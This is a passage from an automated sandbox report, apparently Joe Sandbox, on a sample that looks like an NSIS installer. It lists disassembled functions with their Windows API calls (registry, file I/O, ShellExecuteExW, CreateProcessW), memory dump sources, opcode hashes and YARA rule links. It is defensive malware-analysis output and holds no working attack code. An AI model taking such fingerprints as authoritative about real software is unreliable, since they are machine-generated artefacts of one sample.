                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000436000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000442000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000446000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249652066.0000000000449000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_400000_111.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: PrivateProfileStringWrite
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 390214022-0
                                                                                                                              • Opcode ID: 84911039e741b8054182bf8c56606a22799472c4c6cd86ceafd7de9864a58810
                                                                                                                              • Instruction ID: 2036f094aef4cf8fcdd3ce51ebd23e93268b82f075a1b79732874c3119e34eec
                                                                                                                              • Opcode Fuzzy Hash: 84911039e741b8054182bf8c56606a22799472c4c6cd86ceafd7de9864a58810
                                                                                                                              • Instruction Fuzzy Hash: 30E086319001246ADB303AF15E8DEBF21586F44345B14093FFA12B62C2DAFC0C42467D
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 004062AC Relevance: 1.5, APIs: 1, Instructions: 24registryCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402DEF,00000000,?,?), ref: 004062D5
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2249498923.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000006.00000002.2249483338.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249515278.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.000000000042C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.000000000042F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000431000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000436000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000442000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000446000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249652066.0000000000449000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_400000_111.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Create
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2289755597-0
                                                                                                                              • Opcode ID: 33f0ef72135594440bd39ae1090de480165a05d63dfabbbeebd316e266d8c237
                                                                                                                              • Instruction ID: 3317d7e482e8079663a6db4a97809581e22c1b07b88153a27e00a08cc0e2c803
                                                                                                                              • Opcode Fuzzy Hash: 33f0ef72135594440bd39ae1090de480165a05d63dfabbbeebd316e266d8c237
                                                                                                                              • Instruction Fuzzy Hash: 52E0ECB2020109BEEF19AF90DD1ADBB371DEB04350F01492EF916E4091E6B5A930AA74
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00405F8A Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,0040347A,00000000,00000000,0040329E,?,00000004,00000000,00000000,00000000), ref: 00405F9E
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2249498923.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000006.00000002.2249483338.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249515278.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.000000000042C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.000000000042F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000431000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000436000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000442000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000446000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249652066.0000000000449000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_400000_111.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: FileRead
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2738559852-0
                                                                                                                              • Opcode ID: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                                                                                                                              • Instruction ID: f93b0abb86e743badb4163669300e0f642a0e5fa5e5e92c65fa389833edf0ca2
                                                                                                                              • Opcode Fuzzy Hash: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                                                                                                                              • Instruction Fuzzy Hash: D7E08C3220121AEBEF11AE618C04EEBBB6CFF01360F004832F910E6240D238E8218BA4
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00405FB9 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,00403430,000000FF,0041EA20,?,0041EA20,?,?,00000004,00000000), ref: 00405FCD
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2249498923.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000006.00000002.2249483338.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249515278.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.000000000042C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.000000000042F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000431000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000436000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000442000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000446000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249652066.0000000000449000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_400000_111.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: FileWrite
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3934441357-0
                                                                                                                              • Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                                                                                              • Instruction ID: c6b158df49e6f5968e08b93a39371abef257cf80c9060b8b5a86bf4d0676d75d
                                                                                                                              • Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                                                                                              • Instruction Fuzzy Hash: 1FE0EC3225065AABDF109E669C04EEB7B6CEB053A0F004837FA55E3190D635E821DBA4
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 004023EC Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • GetPrivateProfileStringW.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 0040241D
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2249498923.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000006.00000002.2249483338.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249515278.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.000000000042C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.000000000042F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000431000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000436000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000442000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000446000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249652066.0000000000449000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_400000_111.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: PrivateProfileString
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1096422788-0
                                                                                                                              • Opcode ID: f55628d4b7fc1c3702899dee1337003f381c7036a296fbc4314416ebe8ce5134
                                                                                                                              • Instruction ID: 84a3be15b77accaad8f92e5f77cb7225a0a8ac318d6267ea73d07213f2db240d
                                                                                                                              • Opcode Fuzzy Hash: f55628d4b7fc1c3702899dee1337003f381c7036a296fbc4314416ebe8ce5134
                                                                                                                              • Instruction Fuzzy Hash: D3E04F30800219AADB00AFA0CE09EAE3769BF00300F10093AF520BB0D1E7FC89409749
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0040627E Relevance: 1.5, APIs: 1, Instructions: 19registryCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,?,?,?,?,?,0040630C,?,00000000,?,?,Remove folder: ,?), ref: 004062A2
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2249498923.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000006.00000002.2249483338.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249515278.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.000000000042C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.000000000042F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000431000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000436000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000442000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000446000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249652066.0000000000449000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_400000_111.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Open
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 71445658-0
                                                                                                                              • Opcode ID: dcd566976f3bef00ddda20b11fb2537fa700d8cbfb920dfffbe2909342267143
                                                                                                                              • Instruction ID: 30c71471ac55a0486040fafebf39dce1c160f5eedd86b0188f7d98683811911a
                                                                                                                              • Opcode Fuzzy Hash: dcd566976f3bef00ddda20b11fb2537fa700d8cbfb920dfffbe2909342267143
                                                                                                                              • Instruction Fuzzy Hash: 45D0123254020DBBEF11AF90ED01FAB375DAB08351F01442AFE16A4091D775D530A724
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00404367 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • SetDlgItemTextW.USER32(?,?,00000000), ref: 00404381
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2249498923.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000006.00000002.2249483338.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249515278.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.000000000042C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.000000000042F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000431000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000436000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000442000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000446000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249652066.0000000000449000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_400000_111.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ItemText
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3367045223-0
                                                                                                                              • Opcode ID: 96052eb60a1cf5023800623a4fc8607271db725573605a42fb3903ac644ac0b7
                                                                                                                              • Instruction ID: a8c1326ca85835a951d3062d5a5642934ac055a3243aafebf6fc1767a61cc1e1
                                                                                                                              • Opcode Fuzzy Hash: 96052eb60a1cf5023800623a4fc8607271db725573605a42fb3903ac644ac0b7
                                                                                                                              • Instruction Fuzzy Hash: 27C04C75548200BFD741B755CC82F1FB799EF9431AF00C52EB55CE11D1C67584309A2A
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 004043B3 Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • SendMessageW.USER32(00070486,00000000,00000000,00000000), ref: 004043C5
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2249498923.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000006.00000002.2249483338.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249515278.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.000000000042C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.000000000042F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000431000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000436000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000442000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000446000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249652066.0000000000449000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_400000_111.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: MessageSend
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3850602802-0
                                                                                                                              • Opcode ID: b985a0028b3d47d2300e38cb49a9103195f452c5c5dca8052d978926f7780193
                                                                                                                              • Instruction ID: a8bf680dc00a45444681dc473137f9a6d1885d4682ebfcc4eb1f2e5ca771b872
                                                                                                                              • Opcode Fuzzy Hash: b985a0028b3d47d2300e38cb49a9103195f452c5c5dca8052d978926f7780193
                                                                                                                              • Instruction Fuzzy Hash: 66C04C71754600BADA108B509E46F0677546750701F189429B641A50E0C674E410D61C
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0040347D Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • SetFilePointer.KERNELBASE(?,00000000,00000000,004031DA,?,?,00000007,00000009,0000000B), ref: 0040348B
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2249498923.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000006.00000002.2249483338.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249515278.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.000000000042C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.000000000042F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000431000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000436000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000442000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000446000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249652066.0000000000449000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_400000_111.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: FilePointer
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 973152223-0
                                                                                                                              • Opcode ID: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                                                                                                                              • Instruction ID: 036c8468b6dd2e012b37e6e875261c5f60c7cf4634656b07e897873a541603b6
                                                                                                                              • Opcode Fuzzy Hash: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                                                                                                                              • Instruction Fuzzy Hash: 1FB01231140304BFDA214F10DF09F067B21BB94700F20C034B384380F086711435EB0D
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00405A3D Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • ShellExecuteExW.SHELL32(?), ref: 00405A4C
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2249498923.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000006.00000002.2249483338.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249515278.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.000000000042C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.000000000042F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000431000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000436000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000442000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000446000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249652066.0000000000449000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_400000_111.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ExecuteShell
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 587946157-0
                                                                                                                              • Opcode ID: 34af207f7f04f37b2a6a243a8c8041682423b78b35e6f682d2e1a111f695392f
                                                                                                                              • Instruction ID: 155326c85e208380d9db810c36285a9e1b4200be200639c8195ffcf147e959ee
                                                                                                                              • Opcode Fuzzy Hash: 34af207f7f04f37b2a6a243a8c8041682423b78b35e6f682d2e1a111f695392f
                                                                                                                              • Instruction Fuzzy Hash: BEC092B2000200EFE301CF80CB09F067BE8AF54306F028068E185DA060C7788840CB29
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0040439C Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • SendMessageW.USER32(00000028,?,00000001,004041C7), ref: 004043AA
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2249498923.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000006.00000002.2249483338.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249515278.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.000000000042C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.000000000042F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000431000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000436000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000442000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000446000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249652066.0000000000449000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_400000_111.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: MessageSend
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3850602802-0
                                                                                                                              • Opcode ID: ea04ea026f55595d688d74c1d87789f1c1942be7a89ca5b988cfd0b6025de892
                                                                                                                              • Instruction ID: f9270ce27bc2d5d500308faa7c43699bdd9cec228278350af1c7ef3a72e6c056
                                                                                                                              • Opcode Fuzzy Hash: ea04ea026f55595d688d74c1d87789f1c1942be7a89ca5b988cfd0b6025de892
                                                                                                                              • Instruction Fuzzy Hash: 4FB01235181A00FBDE514B00DE09F857E62F7E4701F058038F341240F0CBB200A4DB08
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00404389 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • KiUserCallbackDispatcher.NTDLL(?,00404160), ref: 00404393
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2249498923.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000006.00000002.2249483338.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249515278.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.000000000042C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.000000000042F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000431000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000436000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000442000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000446000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249652066.0000000000449000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_400000_111.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CallbackDispatcherUser
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2492992576-0
                                                                                                                              • Opcode ID: 88c3b14432b04161d4e03979afc52f71aef4d1a500ec292a4d39f98dda9e77ac
                                                                                                                              • Instruction ID: 0db23a64e3c973129ccb7351ad80e5cfa0365495cc8a336c35755b545d17f2be
                                                                                                                              • Opcode Fuzzy Hash: 88c3b14432b04161d4e03979afc52f71aef4d1a500ec292a4d39f98dda9e77ac
                                                                                                                              • Instruction Fuzzy Hash: 74A00275508601DBDE115B51DF09D057B71A7547017414579A18551034C6314461EB5D
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00401FA4 Relevance: 1.3, APIs: 1, Instructions: 37COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 00405479: lstrlenW.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsi16F5.tmp\,00000000,0084A184,759223A0,?,?,?,?,?,?,?,?,?,004033B0,00000000,?), ref: 004054B1
                                                                                                                                • Part of subcall function 00405479: lstrlenW.KERNEL32(004033B0,Remove folder: C:\Users\user\AppData\Local\Temp\nsi16F5.tmp\,00000000,0084A184,759223A0,?,?,?,?,?,?,?,?,?,004033B0,00000000), ref: 004054C1
                                                                                                                                • Part of subcall function 00405479: lstrcatW.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsi16F5.tmp\,004033B0), ref: 004054D4
                                                                                                                                • Part of subcall function 00405479: SetWindowTextW.USER32(Remove folder: C:\Users\user\AppData\Local\Temp\nsi16F5.tmp\,Remove folder: C:\Users\user\AppData\Local\Temp\nsi16F5.tmp\), ref: 004054E6
                                                                                                                                • Part of subcall function 00405479: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040550C
                                                                                                                                • Part of subcall function 00405479: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405526
                                                                                                                                • Part of subcall function 00405479: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405534
                                                                                                                                • Part of subcall function 004059FA: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00430270,Error launching installer), ref: 00405A23
